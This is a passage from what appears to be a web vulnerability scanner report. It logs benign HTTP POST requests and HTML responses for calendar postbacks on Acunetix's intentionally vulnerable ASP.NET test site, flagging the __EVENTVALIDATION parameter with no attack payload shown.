<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1071 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,071 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8376&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAEDm%2B%2BXX2ghkZGTPIOVuVUomEN382t6tcNEQAWfCuA%3D%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLIr%2BGjAwL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBE6wj%2F1Sd9n%2BbHcuFkQLYt4wm%2Fb2
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:07:14 GMT Content-Length: 12607
Response Body - size: 12,607 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAEDm++XX2ghkZGTPIOVuVUomEN382t6tcNEQAWfCuA==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLIr+GjAwL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBE6wj/1Sd9n+bHcuFkQLYt4wm/b2" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:White" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1137 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,137 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8500&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgBAH4dWOdsIZGRkxCdm7yZ%2BkX2OqI%2FguNrhBNzupSw%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLji%2F7fAwLTp%2BrACAK1zpjCCwK%2Fk8eMBAK%2Fk8eMBAK%2Fk%2FujDQK%2Fk%2FujDQK%2Fk%2B%2FGBgK%2Fk%2B%2FGBgK%2Fk8OvAwK%2Fk8OvAwK%2Fk%2FfCDAK%2Fk%2FfCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd%2BAkCkLqd%2BAkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ%2BKYDAtfZ%2BKYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg%2BoUNAqjg%2BoUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwdYbh5pGvIoSA%2F%2FbMsqJmV6LZng8A%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:31:00 GMT Content-Length: 12481
Response Body - size: 12,481 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgBAH4dWOdsIZGRkxCdm7yZ+kX2OqI/guNrhBNzupSw=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLji/7fAwLTp+rACAK1zpjCCwK/k8eMBAK/k8eMBAK/k/ujDQK/k/ujDQK/k+/GBgK/k+/GBgK/k8OvAwK/k8OvAwK/k/fCDAK/k/fCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd+AkCkLqd+AkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ+KYDAtfZ+KYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg+oUNAqjg+oUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwdYbh5pGvIoSA//bMsqJmV6LZng8A==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8499')" style="color:Black" title="April 09">9</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8500')" style="color:White" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8501')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8502')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8503')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8504')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8505')" style="color:Black" title="April 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8506')" style="color:Black" title="April 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8507')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8508')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8509')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8510')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8511')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8512')" style="color:Black" title="April 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8513')" style="color:Black" title="April 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8514')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8515')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8516')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8517')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8518')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8519')" style="color:Black" title="April 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site 